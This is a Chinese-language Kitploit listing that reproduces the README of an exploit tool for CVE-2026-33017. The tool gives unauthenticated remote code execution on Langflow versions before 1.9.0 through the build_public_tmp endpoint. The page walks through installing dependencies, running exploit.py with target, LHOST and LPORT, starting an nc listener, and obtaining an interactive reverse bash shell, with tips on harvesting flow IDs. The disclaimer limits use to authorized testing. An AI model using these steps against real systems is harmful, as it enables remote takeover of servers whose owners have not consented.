Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-33017-Exploit — 针对 Langflow <1.9.0 中通过 build_public_tmp 端点进行未认证远程代码执行的漏洞利用,提供反向 shell,用于授权渗透测试。 | Kitploit
工具/GitHubGitHub/diamorphine666/cve-2026-33017-exploit
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队远程访问工具
GitHubdiamorphine666/cve-2026-33017-exploit

CVE-2026-33017-Exploit

针对 Langflow <1.9.0 中通过 build_public_tmp 端点进行未认证远程代码执行的漏洞利用,提供反向 shell,用于授权渗透测试。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
22个月前尚未审核
分享

Fireflow RCE 漏洞利用

通过 build_public_tmp 端点在 Langflow 上实现远程代码执行。
通过公共流程构建端点利用漏洞,在目标上执行反向 Shell。

需求

  • Python 3.8+
  • httpx 库

安装:

root@kitploit:~
pip install httpx

使用方法

root@kitploit:~
python exploit.py -u <BASE_URL> -l <LHOST> -p <LPORT> --flow-id <FLOW_ID> --client-id <CLIENT_ID>

参数

  • -u, --url : Langflow 实例的基础 URL(例如 https://flow.example.com/)
  • -l, --lhost : 你的 IP 地址,用于接收反向 Shell
  • -p, --lport : 反向 Shell 的监听端口
  • -f --flow-id : 目标流程 ID(必填 – 通过 /api/v1/flows/ 或 UI 获取)
  • -c --client-id : client_id cookie 值,用于会话标识
  • 示例

    1. 启动监听器:

      root@kitploit:~
      nc -nlvp 9001
      
    2. 运行漏洞利用:

      root@kitploit:~
      python exploit.py -u https://flow.target.local/ -l 127.0.0.1 -p 9001 --flow-id 7d84d636-af65-42e4-ac38-26e867052c25 --client-id 8a6bf601-0263-480b-aa81-9a6389ca9e5d
      
    3. 如果成功,你将获得一个交互式 bash shell。

    重要说明

    • ReadTimeout 是正常的 – 服务器可能无响应,因为 shell 阻塞了 HTTP 请求。只要你在监听器上看到连接,漏洞就已利用成功。
    • 需要有效的 flow-id。通过 GET /api/v1/flows 列出所有流程,或从浏览器 URL 复制。
    • 此工具仅用于授权的渗透测试和教育目的。未经明确许可,不得用于针对系统。

    受影响版本

    • 修复自定义组件 RCE 之前的 Langflow 版本 <1.9.0

    许可证

    MIT – 用于教育和道德安全研究。

    下载工具